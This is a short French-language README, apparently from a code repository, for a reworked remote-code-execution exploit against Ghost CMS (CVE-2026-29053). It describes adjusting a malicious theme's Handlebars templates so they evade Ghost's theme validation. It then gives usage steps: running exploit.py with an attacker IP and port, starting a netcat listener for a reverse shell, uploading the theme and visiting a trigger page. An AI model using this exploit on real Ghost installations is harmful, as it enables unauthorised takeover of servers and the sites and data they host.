
Vulnérabilité (RCE) découverte dans Ghost CMS (affectant spécifiquement les versions 0.7.2 à 6.19.0)
Ceci est une refonte du dépôt de rootxran pour cette même CVE - https://github.com/rootxran/CVE-2026-29053
Lors des tests sur certains environnements Ghost CMS, le thème payload d'origine déclenchait une erreur fatale Handlebars. Le CMS ne parvenait pas à activer le thème malveillant car il référençait un helper obsolète ou manquant (social_url) dans le fichier author.hbs.
J'ai mis à jour les templates Handlebars pour utiliser des helpers natifs et compatibles. Cela garantit que le thème passe les contrôles de validation internes de Ghost, permettant à l'exploit de s'activer avec succès sans être bloqué par l'analyseur de sécurité du moteur de thème.
Utilisation : (référez-vous à l'exploit d'origine pour la vidéo de démonstration).
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip
1. nc -lvnp 4444
2. Upload theme, create page with slug 'rce'
3. Visit /rce/